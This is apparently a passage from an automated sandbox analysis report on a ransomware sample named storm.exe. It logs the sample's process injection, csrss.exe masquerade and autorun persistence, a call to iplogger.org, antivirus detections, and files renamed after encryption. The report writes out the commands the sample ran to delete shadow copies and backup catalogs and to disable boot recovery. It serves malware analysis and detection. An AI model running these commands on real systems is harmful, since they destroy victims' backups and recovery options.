NtProtectVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73011000 process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

geoiptool.com

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~temp001.bat

Creates a suspicious process (7 events)

cmdline	"C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat
cmdline	"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline	"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
cmdline	"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
cmdline	"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
cmdline	wmic shadowcopy delete
cmdline	"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet

Executes one or more WMI queries (1 event)

wmi	SELECT * FROM Win32_ShadowCopy

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 10, 2021, 10:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 10, 2021, 10:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 10, 2021, 10:33 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Aug. 10, 2021, 10:33 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline	wmic shadowcopy delete

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe

reg_value

"C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2376 created a remote thread in non-child process 2088
CreateRemoteThread Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2132 process_identifier: 2088 function_address: 0x000d0000 flags: 0 stack_size: 0 parameter: 0x000c0000 process_handle: 0x00000594	1	1284	0

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2376 manipulating memory of non-child process 2088
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1	0	0

Network communications indicative of possible code injection originated from the process csrss.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetConnectA Aug. 10, 2021, 10:33 a.m.	username: service: 3 hostname: iplogger.org internet_handle: 0x00cc0004 flags: 0 password: port: 80	1	13369352	0
HttpOpenRequestA Aug. 10, 2021, 10:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 3 http_method: GET referer: path: 1L3ig7.gz	1	13369356	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2376 injected into non-child 2088
WriteProcessMemory Aug. 10, 2021, 10:33 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\storm.exe base_address: 0x000b0000 process_identifier: 2088 process_handle: 0x00000594	1	1	0
WriteProcessMemory Aug. 10, 2021, 10:33 a.m.	buffer: ³¤vz¤vÿ¤v base_address: 0x000c0000 process_identifier: 2088 process_handle: 0x00000594	1	1	0
WriteProcessMemory Aug. 10, 2021, 10:33 a.m.	buffer: UìÄðVWEð}ð¥¥¥¥hèÿUøÿuüÿUðøtíhÎúÞÿUô_^å]ÂUìÄØSVW3ÒUØUÜUàUüØ3ÀUhiÐBdÿ0d Û7Uà¸ÐBèÔ2þÿEàè\|ýÿPh¬ÐBèuýÿPèwýÿEäUÜ¸ÄÐBè«2þÿEÜèg\|ýÿPh¬ÐBèLýÿPèNýÿEèUØ¸øÐBè2þÿEØè>\|ýÿPh¬ÐBè#ýÿPè%ýÿEìUü3Àè4)þÿj@h0Eüè}ýÿÀ@PjSèÝýÿðuðEøPEüè`ýÿÀ@PEüèDýÿPVSèØýÿj@h0jjSè§ýÿðEøPjEäPVSè´ýÿ}øuHj@h0hôjSèzýÿøEøPhôh¨ÎBWSèýÿ}øôuEôPjVWjjSè8ýÿÀ3ÀZYYdhpÐBEØºèwýÿEüè~ýÿÃéoýÿëã_^[å]Ãÿÿÿÿ+ÿþücIÐÆùé®É Àz0Ç2· &ÿ¹ base_address: 0x000d0000 process_identifier: 2088 process_handle: 0x00000594	1	1	0

Modifies boot configuration settings (2 events)

command	"c:\windows\system32\cmd.exe" /c bcdedit /set {default} recoveryenabled no
command	"c:\windows\system32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

Removes the Shadow Copy to avoid recovery of the system (2 events)

cmdline	vssadmin delete shadows /all /quiet
cmdline	wmic shadowcopy delete

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2472 thread_handle: 0x000005b4 process_identifier: 2480 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005b8	1	1	0
ShellExecuteExW Aug. 10, 2021, 10:33 a.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe parameters: -start filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe	1	1	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	vssadmin delete shadows /all /quiet
cmdline	"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet

Generates some ICMP traffic

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.Solmyr.l!c
Elastic	malicious (high confidence)
FireEye	Generic.mg.de904e0d5b71c0c3
McAfee	Artemis!DE904E0D5B71
Malwarebytes	Malware.AI.3183379480
Sangfor	Trojan.Win32.Save.a
Alibaba	Ransom:Win32/generic.ali2000010
CrowdStrike	win/malicious_confidence_60% (D)
BitDefenderTheta	Gen:NN.ZexaF.34058.zqW@a4t0QUoi
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Paloalto	generic.ml
Kaspersky	VHO:Trojan-Ransom.Win32.Vega.av
NANO-Antivirus	Virus.Win32.Gen-Crypt.ccnc
Avast	FileRepMalware
Sophos	Mal/Generic-S
McAfee-GW-Edition	BehavesLike.Win32.Generic.gh
SentinelOne	Static AI - Malicious PE
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Win32.Trojan-Ransom.Zeppelin.POEXBW
Cynet	Malicious (score: 100)
Cylance	Unsafe
Tencent	Win32.Trojan.Raas.Auto
Fortinet	W32/Buran.H!tr.ransom
Webroot	W32.Solmyr
AVG	FileRepMalware
Cybereason	malicious.f70404

Executed a process and injected code into it, probably while unpacking (21 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 10, 2021, 10:33 a.m.	thread_handle: 0x000004f0 suspend_count: 1 process_identifier: 2376	1	0
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2472 thread_handle: 0x000005b4 process_identifier: 2480 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005b8	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 360 thread_handle: 0x00000504 process_identifier: 2088 current_directory: filepath: track: 1 command_line: notepad.exe filepath_r: stack_pivoted: 0 creation_flags: 134217796 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000510	1	1
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1	0
WriteProcessMemory Aug. 10, 2021, 10:33 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\storm.exe base_address: 0x000b0000 process_identifier: 2088 process_handle: 0x00000594	1	1
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1	0
WriteProcessMemory Aug. 10, 2021, 10:33 a.m.	buffer: ³¤vz¤vÿ¤v base_address: 0x000c0000 process_identifier: 2088 process_handle: 0x00000594	1	1
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000594	1	0
WriteProcessMemory Aug. 10, 2021, 10:33 a.m.	buffer: UìÄðVWEð}ð¥¥¥¥hèÿUøÿuüÿUðøtíhÎúÞÿUô_^å]ÂUìÄØSVW3ÒUØUÜUàUüØ3ÀUhiÐBdÿ0d Û7Uà¸ÐBèÔ2þÿEàè\|ýÿPh¬ÐBèuýÿPèwýÿEäUÜ¸ÄÐBè«2þÿEÜèg\|ýÿPh¬ÐBèLýÿPèNýÿEèUØ¸øÐBè2þÿEØè>\|ýÿPh¬ÐBè#ýÿPè%ýÿEìUü3Àè4)þÿj@h0Eüè}ýÿÀ@PjSèÝýÿðuðEøPEüè`ýÿÀ@PEüèDýÿPVSèØýÿj@h0jjSè§ýÿðEøPjEäPVSè´ýÿ}øuHj@h0hôjSèzýÿøEøPhôh¨ÎBWSèýÿ}øôuEôPjVWjjSè8ýÿÀ3ÀZYYdhpÐBEØºèwýÿEüè~ýÿÃéoýÿëã_^[å]Ãÿÿÿÿ+ÿþücIÐÆùé®É Àz0Ç2· &ÿ¹ base_address: 0x000d0000 process_identifier: 2088 process_handle: 0x00000594	1	1
NtResumeThread Aug. 10, 2021, 10:33 a.m.	thread_handle: 0x0000031c suspend_count: 1 process_identifier: 2480	1	0
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2248 thread_handle: 0x0000057c process_identifier: 2916 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000580	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2208 thread_handle: 0x0000058c process_identifier: 2816 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000588	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2272 thread_handle: 0x00000594 process_identifier: 2844 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000590	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2312 thread_handle: 0x00000598 process_identifier: 2256 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000584	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 776 thread_handle: 0x000005a0 process_identifier: 532 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000059c	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2392 thread_handle: 0x000005a8 process_identifier: 2396 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000005a4	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2808 thread_handle: 0x000005b0 process_identifier: 3000 current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Windows\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0 filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000005ac	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2876 thread_handle: 0x00000084 process_identifier: 3048 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\wbem\WMIC.exe track: 1 command_line: wmic shadowcopy delete filepath_r: C:\Windows\System32\Wbem\WMIC.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2660 thread_handle: 0x00000084 process_identifier: 2648 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\vssadmin.exe track: 1 command_line: vssadmin delete shadows /all /quiet filepath_r: C:\Windows\system32\vssadmin.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 156 thread_handle: 0x00000084 process_identifier: 2968 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\wbem\WMIC.exe track: 1 command_line: wmic shadowcopy delete filepath_r: C:\Windows\System32\Wbem\WMIC.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Aug. 10, 2021, 10:33 a.m.	thread_identifier: 2132 thread_handle: 0x0000008c process_identifier: 360 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\vssadmin.exe track: 1 command_line: vssadmin delete shadows /all /quiet filepath_r: C:\Windows\system32\vssadmin.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

Drops 10559 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 10472 events)

file	c:\program files (x86)\hnc\shared80\clipart\m_rest\rest_11.jpg.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\themes\dark\close.png.kd8eby0.192-37c-b0c
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Doc\Kor\PUBLIC\PUBL168.hwt
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\ita\fillsign.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\ukr\comments.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\teacher\teache32.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\student\studen17.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\account\accon029.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\tur\pages_r_rhp.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ft_foreign\talef_07.drt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\locale\ca_es\accessibility.cat.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\common80\imgfilters\gs\fonts\b018032l.pfm.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\walk-through\images\themes\dark\dc_share_upsell_2x.png.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\ui-strings.js.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\agmgpuoptin.ini.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\sky\forms_r_rhp.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\locale\sl_si\reflow.slv.kd8eby0.192-37c-b0c
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Doc\Kor\RELIGION\BUDDHISM20.hwt
file	c:\program files (x86)\hnc\shared80\clipart\ec_math\mat033.png.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\rollconv.ps.kd8eby0.192-37c-b0c
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CR_Humor\Humor_10.drt
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\diary\diary23.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\g2brun\jre7\lib\images\cursors\win32_copynodrop32x32.gif.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\resource\cmap\ucs2-90pv-rksj.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\clipart\m_economy\economy_20.png.kd8eby0.192-37c-b0c
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\DG_CommArrows\ArroG_35.drt
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\esp\richmedia_r_rhp.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\trade\trade101.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\enu\moretools.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hncdics\dictionary\english\prefixfilter.dat.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\house\house015.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\hrv\actions_r_rhp.aapp.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\clipart\m_cooperation\cooperation_29.png.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\common80\imgfilters\imcd39.flt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\clipart\m_simple\simple_13.png.kd8eby0.192-37c-b0c
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Doc\Kor\PERSONAL\PERSO026.hwt
file	c:\program files (x86)\g2brun\jre7\lib\zi\america\lima.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\scan-files\images\themeless\appstore\download_on_the_app_store_badge_zh_cn_135x40.svg.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\clipart\imagebullet\034.png.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\gs_cff.ps.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\locale\da_dk\annots.dan.kd8eby0.192-37c-b0c
file	c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\ob-preview\js\nls\pt-br\ui-strings.js.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\calendar\calend29.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\fonts\yjhgini.hft.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\product\produ147.hwt.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\clipart\m_school\school_07.png.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\clipart\ec_science\sci010.png.kd8eby0.192-37c-b0c
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\product\produ107.hwt.kd8eby0.192-37c-b0c

storm.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All